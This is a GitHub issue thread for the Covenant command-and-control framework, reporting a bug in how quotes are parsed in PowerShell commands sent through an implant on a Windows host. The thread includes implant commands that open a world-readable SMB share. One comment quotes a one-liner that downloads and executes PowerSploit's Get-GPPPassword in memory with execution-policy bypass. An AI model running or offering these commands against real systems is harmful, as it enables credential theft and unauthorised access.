### ISSUE TITLE
[Bug] Quoting in supplied command not being handled correctly

### ISSUE THREAD

**Issue by C-Sto** [cobbr/Covenant#118]
**Feature Request or Bug**
Bug

**Describe the feature request or bug**
Quoting in powershell command causing errors

**To Reproduce**
Drop implant on windows host, submit powershell command with quotes

**Expected behavior**
Command should run

**Screenshots**
```
[11/22/19 2:38:41 AM UTC] PowerShell completed

(admin) > powershell new-item -path "C:\" -Name "shared" -itemtype "directory"; new-smbshare -name "shared" -Path C:\shared -readaccess "everyone"

System.Management.Automation.IncompleteParseException: The string is missing the terminator: ".
   at System.Management.Automation.AutomationEngine.ParseScriptBlock(String script, String fileName, Boolean interactiveCommand)
   at System.Management.Automation.Runspaces.Command.CreateCommandProcessor(ExecutionContext executionContext, CommandFactory commandFactory, Boolean addToHistory, CommandOrigin origin)
   at System.Management.Automation.Runspaces.LocalPipeline.CreatePipelineProcessor()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()

[11/22/19 2:40:44 AM UTC] PowerShell completed

(admin) > powershell new-item -path "C:\\" -Name "shared" -itemtype "directory"; new-smbshare -name "shared" -Path C:\shared -readaccess "everyone"

System.Management.Automation.IncompleteParseException: The string is missing the terminator: ".
   at System.Management.Automation.AutomationEngine.ParseScriptBlock(String script, String fileName, Boolean interactiveCommand)
   at System.Management.Automation.Runspaces.Command.CreateCommandProcessor(ExecutionContext executionContext, CommandFactory commandFactory, Boolean addToHistory, CommandOrigin origin)
   at System.Management.Automation.Runspaces.LocalPipeline.CreatePipelineProcessor()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
```

**Covenant Server Information:**
 - OS: Ubuntu
 - Docker or Native: Native

**Browser Information:**
 - Chrome 
 - Not relevant

**Target Information (System that implant is running on):**
 - OS: Windows
 - Version Microsoft Windows NT 6.3.9600.0

**Additional context**
Provided both versions (with two \'s and one \) just incase it was being escaped there (which it doesn't seem to be)

**Comment by s0lari** [comment]
Looks like it is being escaped in some way:

`PowerShell /powershellcommand:"powershell -exec bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1'); Get-GPPPassword\""`

I didn't add the slashes into the command when i tried running it - this is what is causing issues when the command is passed to powershell i believe - there is additional " mark being added at the end too.

**Comment by cobbr** [comment]
I think this should now be fixed in 8c3671c86b96efffc0927fad4122867ce3845fd6 in dev branch, will merge to master soon.

Can you verify that this is fixed for you @C-Sto?

**Comment by cobbr** [comment]
Closing for now, I think this should be fixed. If you continue to have problems, we can reopen.
